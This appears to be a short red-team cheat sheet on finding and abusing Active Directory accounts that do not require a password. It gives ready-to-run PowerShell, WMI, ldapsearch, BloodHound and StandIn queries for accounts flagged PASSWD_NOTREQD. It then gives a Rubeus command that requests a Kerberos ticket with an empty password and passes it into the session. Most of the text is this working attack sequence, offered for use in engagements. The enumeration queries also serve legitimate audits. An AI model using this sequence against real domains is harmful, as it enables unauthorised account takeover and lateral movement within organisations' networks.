Blank passwords

Search for account has the flag ” PASSWD_NOTREQD ” set to “True” in the “useraccountcontrol” attribute and are enabled.

# ActiveDirectory module
Get-ADUser -Filter {PasswordNotRequired -eq $true -and Enabled -eq $true} | Select SamAccountName

# WMI
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE PasswordRequired=False AND Disabled=False" | select Name

# Ldapsearch
ldapsearch (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) cn

# BloodHound
MATCH (n:User {enabled: True, passwordnotreqd: True}) RETURN n

# StadIn
StandIn.exe --passnotreq

Once we identified account we can try requesting TGT using rubeus:

Rubeus.exe asktgt /user:nopassacount /password:"" /ptt

Credit:

https://northwave-security.com/abusing-empty-passwords-during-your-next-red-teaming-engagement/